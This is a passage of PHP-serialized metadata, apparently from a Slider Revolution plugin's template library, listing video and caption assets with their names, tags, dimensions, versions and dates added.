11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:356;a:13:{s:2:\"id\";s:3:\"482\";s:6:\"handle\";s:20:\"Blinking-bubbles.jpg\";s:5:\"video\";s:20:\"Blinking-bubbles.mp4\";s:4:\"name\";s:17:\"Blinking bubbles \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:357;a:13:{s:2:\"id\";s:3:\"481\";s:6:\"handle\";s:13:\"Fireworks.jpg\";s:5:\"video\";s:13:\"Fireworks.mp4\";s:4:\"name\";s:10:\"Fireworks \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:358;a:13:{s:2:\"id\";s:3:\"480\";s:6:\"handle\";s:12:\"Dark-ink.jpg\";s:5:\"video\";s:12:\"Dark-ink.mp4\";s:4:\"name\";s:9:\"Dark ink \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"28\";s:6:\"handle\";s:11:\"abstraction\";s:4:\"name\";s:11:\"Abstraction\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-23 11:20:38\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:359;a:13:{s:2:\"id\";s:3:\"238\";s:6:\"handle\";s:12:\"Mt_Baker.jpg\";s:5:\"video\";s:12:\"Mt_Baker.mp4\";s:4:\"name\";s:9:\"Mt Baker \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:360;a:13:{s:2:\"id\";s:3:\"237\";s:6:\"handle\";s:16:\"Two-Swimmers.jpg\";s:5:\"video\";s:16:\"Two-Swimmers.mp4\";s:4:\"name\";s:13:\"Two Swimmers \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:361;a:13:{s:2:\"id\";s:3:\"236\";s:6:\"handle\";s:14:\"Boats_Maze.jpg\";s:5:\"video\";s:14:\"Boats_Maze.mp4\";s:4:\"name\";s:11:\"Boats Maze \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:362;a:13:{s:2:\"id\";s:3:\"235\";s:6:\"handle\";s:18:\"Candolim-Beach.jpg\";s:5:\"video\";s:18:\"Candolim-Beach.mp4\";s:4:\"name\";s:15:\"Candolim Beach \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"20\";s:6:\"handle\";s:5:\"Beach\";s:4:\"name\";s:5:\"Beach\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:363;a:13:{s:2:\"id\";s:3:\"234\";s:6:\"handle\";s:17:\"Working-Space.jpg\";s:5:\"video\";s:17:\"Working-Space.mp4\";s:4:\"name\";s:14:\"Working Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:364;a:13:{s:2:\"id\";s:3:\"233\";s:6:\"handle\";s:9:\"Wavez.jpg\";s:5:\"video\";s:9:\"Wavez.mp4\";s:4:\"name\";s:6:\"Wavez \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:365;a:13:{s:2:\"id\";s:3:\"232\";s:6:\"handle\";s:17:\"Coconut-Grove.jpg\";s:5:\"video\";s:17:\"Coconut-Grove.mp4\";s:4:\"name\";s:14:\"Coconut Grove \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:366;a:13:{s:2:\"id\";s:3:\"231\";s:6:\"handle\";s:19:\"Very-Open-Space.jpg\";s:5:\"video\";s:19:\"Very-Open-Space.mp4\";s:4:\"name\";s:16:\"Very Open Space \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:367;a:13:{s:2:\"id\";s:3:\"230\";s:6:\"handle\";s:14:\"Office-Day.jpg\";s:5:\"video\";s:14:\"Office-Day.mp4\";s:4:\"name\";s:11:\"Office Day \";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:368;a:13:{s:2:\"id\";s:3:\"229\";s:6:\"handle\";s:12:\"The-Hill.jpg\";s:5:\"video\";s:12:\"The-Hill.mp4\";s:4:\"name\";s:9:\"The Hill \";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2018-07-16 15:34:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"3\";}i:369;a:13:{s:2:\"id\";s:3:\"339\";s:6:\"handle\";s:19:\"best_price_dark.jpg\";s:5:\"video\";s:19:\"best_price_dark.mp4\";s:4:\"name\";s:15:\"best_price_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"best_price_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:370;a:13:{s:2:\"id\";s:3:\"337\";s:6:\"handle\";s:27:\"limited_time_offer_dark.jpg\";s:5:\"video\";s:27:\"limited_time_offer_dark.mp4\";s:4:\"name\";s:23:\"limited_time_offer_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:23:\"limited_time_offer_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:371;a:13:{s:2:\"id\";s:3:\"336\";s:6:\"handle\";s:26:\"slider_revolution_dark.jpg\";s:5:\"video\";s:26:\"slider_revolution_dark.mp4\";s:4:\"name\";s:22:\"slider_revolution_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:22:\"slider_revolution_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:372;a:13:{s:2:\"id\";s:3:\"335\";s:6:\"handle\";s:19:\"mick_brown_dark.jpg\";s:5:\"video\";s:19:\"mick_brown_dark.mp4\";s:4:\"name\";s:15:\"mick_brown_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"mick_brown_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-26 09:24:35\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:373;a:13:{s:2:\"id\";s:3:\"334\";s:6:\"handle\";s:14:\"sales_dark.jpg\";s:5:\"video\";s:14:\"sales_dark.mp4\";s:4:\"name\";s:10:\"sales_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:10:\"sales_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:374;a:13:{s:2:\"id\";s:3:\"333\";s:6:\"handle\";s:21:\"robert_smith_dark.jpg\";s:5:\"video\";s:21:\"robert_smith_dark.mp4\";s:4:\"name\";s:17:\"robert_smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"robert_smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:375;a:13:{s:2:\"id\";s:3:\"332\";s:6:\"handle\";s:21:\"product_name_dark.jpg\";s:5:\"video\";s:21:\"product_name_dark.mp4\";s:4:\"name\";s:17:\"product_name_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"product_name_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:376;a:13:{s:2:\"id\";s:3:\"331\";s:6:\"handle\";s:21:\"high_quality_dark.jpg\";s:5:\"video\";s:21:\"high_quality_dark.mp4\";s:4:\"name\";s:17:\"high_quality_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"high_quality_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:377;a:13:{s:2:\"id\";s:3:\"330\";s:6:\"handle\";s:24:\"robert_johnson_light.jpg\";s:5:\"video\";s:24:\"robert_johnson_light.mp4\";s:4:\"name\";s:20:\"robert_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"robert_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:378;a:13:{s:2:\"id\";s:3:\"329\";s:6:\"handle\";s:21:\"jake_collins_dark.jpg\";s:5:\"video\";s:21:\"jake_collins_dark.mp4\";s:4:\"name\";s:17:\"jake_collins_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"jake_collins_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:32:18\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:379;a:13:{s:2:\"id\";s:3:\"328\";s:6:\"handle\";s:22:\"daniele_wood_light.jpg\";s:5:\"video\";s:22:\"daniele_wood_light.mp4\";s:4:\"name\";s:18:\"daniele_wood_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"daniele_wood_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-12 08:31:30\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:380;a:13:{s:2:\"id\";s:3:\"327\";s:6:\"handle\";s:23:\"michael_blake_light.jpg\";s:5:\"video\";s:23:\"michael_blake_light.mp4\";s:4:\"name\";s:19:\"michael_blake_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"michael_blake_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:381;a:13:{s:2:\"id\";s:3:\"326\";s:6:\"handle\";s:22:\"product_name_light.jpg\";s:5:\"video\";s:22:\"product_name_light.mp4\";s:4:\"name\";s:18:\"product_name_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"product_name_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:382;a:13:{s:2:\"id\";s:3:\"325\";s:6:\"handle\";s:24:\"rebecca_cooper_light.jpg\";s:5:\"video\";s:24:\"rebecca_cooper_light.mp4\";s:4:\"name\";s:20:\"rebecca_cooper_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:20:\"rebecca_cooper_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:383;a:13:{s:2:\"id\";s:3:\"324\";s:6:\"handle\";s:28:\"limited_time_offer_light.jpg\";s:5:\"video\";s:28:\"limited_time_offer_light.mp4\";s:4:\"name\";s:24:\"limited_time_offer_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:24:\"limited_time_offer_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:384;a:13:{s:2:\"id\";s:3:\"322\";s:6:\"handle\";s:22:\"jake_michael_light.jpg\";s:5:\"video\";s:22:\"jake_michael_light.mp4\";s:4:\"name\";s:18:\"jake_michael_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:18:\"jake_michael_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:385;a:13:{s:2:\"id\";s:3:\"321\";s:6:\"handle\";s:23:\"colin_johnson_light.jpg\";s:5:\"video\";s:23:\"colin_johnson_light.mp4\";s:4:\"name\";s:19:\"colin_johnson_light\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"26\";s:6:\"handle\";s:5:\"light\";s:4:\"name\";s:5:\"Light\";}}s:11:\"description\";s:19:\"colin_johnson_light\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-03-05 09:20:21\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:386;a:13:{s:2:\"id\";s:3:\"320\";s:6:\"handle\";s:21:\"colin_morris_dark.jpg\";s:5:\"video\";s:21:\"colin_morris_dark.mp4\";s:4:\"name\";s:17:\"colin_morris_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"colin_morris_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:387;a:13:{s:2:\"id\";s:3:\"319\";s:6:\"handle\";s:22:\"justin_cooper_dark.jpg\";s:5:\"video\";s:22:\"justin_cooper_dark.mp4\";s:4:\"name\";s:18:\"justin_cooper_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"justin_cooper_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:388;a:13:{s:2:\"id\";s:3:\"318\";s:6:\"handle\";s:21:\"james-dodson_dark.jpg\";s:5:\"video\";s:21:\"james-dodson_dark.mp4\";s:4:\"name\";s:17:\"james-dodson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"james-dodson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:389;a:13:{s:2:\"id\";s:3:\"317\";s:6:\"handle\";s:23:\"robert_sanders_dark.jpg\";s:5:\"video\";s:23:\"robert_sanders_dark.mp4\";s:4:\"name\";s:19:\"robert_sanders_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"robert_sanders_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:390;a:13:{s:2:\"id\";s:3:\"316\";s:6:\"handle\";s:21:\"emily_carney_dark.jpg\";s:5:\"video\";s:21:\"emily_carney_dark.mp4\";s:4:\"name\";s:17:\"emily_carney_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:17:\"emily_carney_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:391;a:13:{s:2:\"id\";s:3:\"315\";s:6:\"handle\";s:22:\"michael-smith_dark.jpg\";s:5:\"video\";s:22:\"michael-smith_dark.mp4\";s:4:\"name\";s:18:\"michael-smith_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"michael-smith_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:392;a:13:{s:2:\"id\";s:3:\"314\";s:6:\"handle\";s:23:\"sandra_johnson_dark.jpg\";s:5:\"video\";s:23:\"sandra_johnson_dark.mp4\";s:4:\"name\";s:19:\"sandra_johnson_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:19:\"sandra_johnson_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:393;a:13:{s:2:\"id\";s:3:\"313\";s:6:\"handle\";s:22:\"robert_bolton_dark.jpg\";s:5:\"video\";s:22:\"robert_bolton_dark.mp4\";s:4:\"name\";s:18:\"robert_bolton_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:18:\"robert_bolton_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-21 09:07:08\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:394;a:13:{s:2:\"id\";s:3:\"312\";s:6:\"handle\";s:25:\"elegant_captions_dark.png\";s:5:\"video\";s:25:\"elegant_captions_dark.mp4\";s:4:\"name\";s:21:\"elegant_captions_dark\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:21:\"elegant_captions_dark\";s:5:\"width\";s:3:\"552\";s:6:\"height\";s:3:\"300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-18 14:41:45\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"4\";}i:395;a:13:{s:2:\"id\";s:3:\"311\";s:6:\"handle\";s:19:\"Caption_Dark_06.png\";s:5:\"video\";s:19:\"Caption_Dark_06.mp4\";s:4:\"name\";s:15:\"Caption_Dark_06\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"25\";s:6:\"handle\";s:4:\"dark\";s:4:\"name\";s:4:\"Dark\";}}s:11:\"description\";s:15:\"Caption_Dark_06\";s:5:\"width\";s:3:\"414\";s:6:\"height\";s:3:\"225\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-02-14 